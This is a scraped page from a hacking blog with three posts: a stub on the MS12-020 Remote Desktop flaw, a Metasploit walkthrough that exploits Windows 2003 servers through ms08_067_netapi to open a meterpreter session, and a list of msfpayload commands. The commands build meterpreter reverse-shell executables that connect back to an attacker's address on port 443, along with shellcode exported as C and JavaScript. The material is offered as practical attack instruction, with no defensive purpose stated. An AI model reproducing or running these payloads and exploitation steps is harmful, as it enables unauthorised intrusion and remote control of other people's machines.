blog-windows | MS12-020 -- Critical vulnerability to attack on windows system

blog-windows.com | MS12-020 -- Critical vulnerability to attack on windows system


Hi All,
Welcome to my new video on critical vulnerability to attack on windows system.
The vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020) - a patch for which has been released by during the last Patch Tuesday.

this video made by blog-windows.com
demo: 

Share Your Knowledge................................by comment -Regards, blog-windows blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker

blog-windows | Metasploit - Windows 2003 Server Exploitation with ms08_067_netapi vulnerability

blog-windows | Metasploit - Windows 2003 Server Exploitation with ms08_067_netapi vulnerability

In this article we will focus on exploitation a Windows 2003 server through the Microsoft directory service vulnerability.

We have performed a port scan with Nmap and we have observed that microsoft-ds service is open on port 445.

The use of this service is for file sharing activities in Windows environments.

Microsoft-ds Service is Open

Next step will be to open the metasploit framework in order to find the appropriate exploit that it will give us access to the remote server.

We already know that the port 445 is for the SMB service. So our search will be on the SMB exploits like the netapi.

Specifically the exploit that we are going to use is the ms08_067_netapi which exploits a parsing flaw in the path canonicalization code of NetAPI32.dll.

Search for the netapi Exploit

So we are configuring the exploit with the appropriate IP addresses and we will use as a payload the meterpreter service.

Netapi Exploit Configuration

Now it is time to run the exploit against the target machine and as we can see from the image below it successfully opened a meterpreter session.

Exploitation with the Netapi

We can use the sysinfo command of the meterpreter in order to discover our first information about the Windows 2003 Server.

Note:

The microsoft-ds is a very common service in Windows machines. Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445.Remember that this exploit will only work against a Windows 2003 Server it will work only in the following versions: Windows 2003 SP0,Windows 2003 SP1 and Windows 2003 SP2.

Share Your Knowledge................................by comment -Regards, blog-windows blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker

Metasploit :- Payload Commands

blog-windows | Metasploit - Payload Commands

Here is a list with the available payload commands.

msfpayload -l

List available payloads

msfpayload windows/meterpreter/bind_tcp O

List all available options for the windows/meterpreter/bind_tcp payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 X >
payload.exe

Create a Meterpreter reverse_tcp payload to connect back to our IP on port 443.Then saves it as Windows executable file with the name payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R >
payload.raw

Create a Meterpreter reverse_tcp payload to connect back to our IP and saves it as raw format.It can be combined with msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c

Export as C-formatted shellcode

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java

Export as %u encoded JavaScript

Share Your Knowledge................................by comment -Regards, blog-windows blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker